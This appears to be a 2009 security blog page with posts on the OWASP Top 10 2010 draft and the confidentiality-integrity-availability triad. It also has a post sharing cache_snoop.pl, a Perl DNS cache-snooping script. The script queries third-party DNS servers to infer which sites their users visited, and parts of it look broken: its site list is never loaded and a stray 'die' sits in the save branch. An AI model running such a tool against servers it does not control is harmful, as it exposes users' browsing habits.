OWASP Top 10 2010 RC1

Posted by Brett Hardin on 13th November 2009

Reading time: 2 – 4 minutes

Photo: Rionda

Photo: Rionda

While attending OWASP AppSec DC this week, I was able to see the preliminary release of the OWASP top 10 for 2010. This is the first release candidate and the 2010 top 10 are now available for public comment. We will soon see what the security community thinks of it, but OWASP is hoping for an finalized release in the early first quarter of 2010.

For regular readers, you will not see much new on the OWASP top 10 2010. The main change is the order, or rather priority, of vulnerabilities has been changed. While the OWASP Top 10 – 2007 list focused on the top 10 vulnerabilities in web applications. The 2010 top 10 have been re-clarified to reflect the Top 10 Application security risks to an organization.

The 2007 list also focused on the frequency of the occurrences of the vulnerabilities in the web application. However, the OWASP Top Ten 2010 list is prioritized based on an estimated risk to the organization.

Risks Added to the OWASP 2010 Top 10

The new vulnerabilities are Security Misconfiguration (A6) and Unvalidated Redirects and Forwards (A8). I will address these two risks in future articles.

Vulnerabilities Removed from the OWASP 2010 Top 10

Since two risks were added, the OWASP had to replace vulnerabilities that were already on the list. These vulnerabilities are Malicious File Execution and Information Leakage and Improper Error Handling.

Malicious File Execution has been removed due to the reduction of how prevalent this vulnerability is now compared to 2007. OWASP also states that PHP is being shipped with more default security built-in. This is why it has been removed from the list.

Information Leakage and Improper Error Handling has been removed from the typical low impact of disclosing stack traces and error messages to the user. (Personally, I disagree with this.)

OWASP Top 10 2010 RC1

A1 – Injection
A2 – Cross-Site Scripting (XSS)
A3 – Broken Authentication and Session Management
A4 – Insecure Direct Object References
A5 – Cross Site Request Forgery (CSRF)
A6 – Security Misconfiguration
A7 – Failure to Restrict URL Access
A8 – Unvalidated Redirects and Forwards
A9 – Insecure Cryptographic Storage
A10 – Insecure Communications

We shall see in the next few months what the community thinks of these changes.

13Nov

Confidentiality, Integrity, and Availability

Posted by Brett Hardin on 4th November 2009

Reading time: 2 – 3 minutes

Confidentiality, Integrity, and Availability

Photo: jaeming

Being security aware and security conscious often boils down to understanding three key concepts that are common to risk management

These security concepts have been around since the inception of information security. Although, these are high-level generalizations, they are important for everyone to know about.

This article is focused on understanding how each of these apply to information systems.

Confidentiality

Confidentiality loss happens when information can be viewed (read) by individuals who shouldn’t access it.

Loss of confidentiality can happen physically or electronically.

Electronic confidentiality loss can happen when the clients and servers aren’t encrypting their communications. This allows malicious entities to view private communications.

Physical confidential loss can happen through social engineering or through theft. This typically means having laptops stolen.

Integrity

Integrity loss happens when information is modified without the modification being authorized. This doesn’t mean that an unauthorized party has to cause the integrity loss to happen. The integrity loss due to an authorized party doing something they shouldn’t. An example would be a system administrator deleting an account record they weren’t authorized to delete.

Integrity Loss can happen either accidentally or through malicious intent. Malicious integrity loss can happen when a user purposely adds, deletes, or modifies database records. This can occur either through an authorized party (someone who has the access to actually modify the record) or by an unauthorized party when the user has access that they shouldn’t have.

Accidental integrity loss happens when a system modifies or deletes records that it shouldn’t. This can happen when a virus infects a system or when a user does something that he didn’t intend to do. This is often why systems will verify that you want a file deleted, before it actually does so.

Availability

Availability is the simple idea that when a user or system attempts to access something, it is available to be accessed. This is extremely important for mission critical systems. Availability for these systems are so critical that most companies have business continuity plans (BCP’s) in order for there systems to have redundancy.

Just like confidentiality and integrity loss, availability loss can happen by accident, a car crashing into a fiber pole disabling access to a system, or through malicious intent, such as a Denial-of-Service attack.

4Nov

Cache_Snoop.pl

Posted by Brett Hardin on 28th October 2009

Reading time: 4 – 6 minutes

Photo: Tim Caynes

Photo: Tim Caynes

In the book, Hacking: The Next Generation, I cover a topic referred to as DNS cache snooping. Cache snooping is not a new attack and has been around for quite a while [PDF]. However, I couldn’t find a good piece of code that would interrogate DNS servers, so I created code to do it.

I put it in Appendix B in the book, but figured it would be nice to have some place to copy & paste it.

Let me know if you have any questions or comments. Have Fun!

Cache_Snoop.pl

#!/usr/bin/perl
# cache_snoop.pl
# Developed by: Brett Hardin
$version = “1.0″;
use Getopt::Long;

my $options = GetOptions (
“help” => \$help,
“save” => \$save,
“dns=s” => \$dns_server,
“ttl” => \$ttl_option,
“queries=s” => \$queries
);

if($help ne “”) { &Help; }
if($dns_server eq “”) { die “Usage: cache_snoop.pl -dns -queries \n”; }
open(FILE, $queries) or die “Usage: cache_snoop.pl -dns -queries \n”;

@sites;

#FIRST RUN IS FOR FINDING OUT DEFUALT TTL
if($ttl_option ne “”) {
print “Finding Default TTL’s…\n”;
&default_TTL;
}

for $site (@sites) {
chomp($site);
$default_TTL = $TTL_list{$site};

if($site =~ /^\#/) { print $site . “\n”; next; }
if($site =~ /^$/) { print “\n”; next;}

$results = `dig \@$dns_server $site A +norecurse`;

if ($results =~ /ANSWER: 0,/) {
print “[NO] ” . $site . ” not visited\n”;
}
else {
@edited_result = split(/\n/, $results);
@greped_result = grep(/^$site\./, @edited_result);
@A_Broke = split(/\s+/, $greped_result[0]);
$TTL = $A_Broke[1];

print “[YES] ” . $site . ” ($TTL”;
if($ttl_option ne “”) {
&timeLeft;
print “/$default_TTL) – Initial Request was made: $LAST_VISITED\n”;
}
else { print ” TTL)\n”; }

if($save ne “”) {
print $results; die;
open(OUTPUT, “>$site.DNS.txt”);
print OUTPUT $results;
close(OUTPUT);
}
}
}

sub timeLeft{
$seconds = ($default_TTL – $TTL);
@parts = gmtime($seconds);
$LAST_VISITED = “$parts[7]d $parts[2]h $parts[1]m $parts[0]s”;
}

sub default_TTL {
# This function returns the default TTL
# To do this, you need to find the DNS server from the root DNS server
# then query that DNS server for the site you are looking for, it will return the default TTL
%DNS_list = ();
%TTL_list = ();

# Find the NS for the site
for $site (@sites) {
if($site =~ /^\#/) { next; }
if($site =~ /^$/) { next;}

chomp($site);

#QUERY the TLD domain
$query_result_1 = `dig \@a.gtld-servers.net $site`;
@edited_query_1 = split(/\n/, $query_result_1);
$found = 0;

# Find the DNS server
for $each (@edited_query_1) {
if ($found == 1) {
@A_Broke = split(/\s+/, $each);
$root_DNS = $A_Broke[0];
last;
}
if($each =~ /ADDITIONAL SECTION:/) { $found = 1; }
}
$DNS_list{$site} = $root_DNS;
}
print “Done with Name Server lookup…\n”;;

# Find the TTL from the default NS server.
foreach $site (sort keys %DNS_list) {
#print “$site: $DNS_list{$site}\n”;
$DNS_SERVER = $DNS_list{$site};

#QUERY the TLD domain
$query_result_2 = `dig \@$DNS_SERVER $site`;

@edited_query_2 = split(/\n/, $query_result_2);
$found = 0;

# Find the DNS server
for $each (@edited_query_2) {
if ($found == 1) {
@A_Broke = split(/\s+/, $each);
$default_TTL = $A_Broke[1];
last;
}
if($each =~ /ANSWER SECTION:/) { $found = 1; }
}
#print $site . ” default TTL: $default_TTL\n”;
$TTL_list{$site} = $default_TTL;
}
print “Done with TTL lookups…\n”;

foreach $site (sort keys %TTL_list) {
print “$site – $TTL_list{$site}\n”;
}
}

sub Help {
print “\n”;
print “#################################\n”;
print “# #\n”;
print “# cache_snoop.pl v$version #\n”;
print “# #\n”;
print “#################################\n\n”;
print “usage: $0 -dns -queries \n”;
print “\n”;
print “purpose: Exploit a DNS server that allows 3rd party queries to determine what sites\n”;
print ” the DNS servers users have been going to.\n”;
print “\n”;
print ” Options:\n\n”;
print ” -help What your looking at.\n”;
print ” -dns [required] DNS server susceptible to 3rd party queries\n”;
print ” -queries file with the queries you would like to make [Default: queries.txt]\n”;
print ” -save Save the DNS responses that are received to individual text files.\n”;
print ” -ttl Will lookup the default TTL’s and comparing them with what the server has.\n”;
print “\n”;
print “Sample Output:\n”;
print “[NO] fidelity.com not visited\n”;
print “[YES] finance.google.com (165020) visited\n”;
print “[Visited] site (TTL)\n”;
print “\n\n”;
exit;
}

28Oct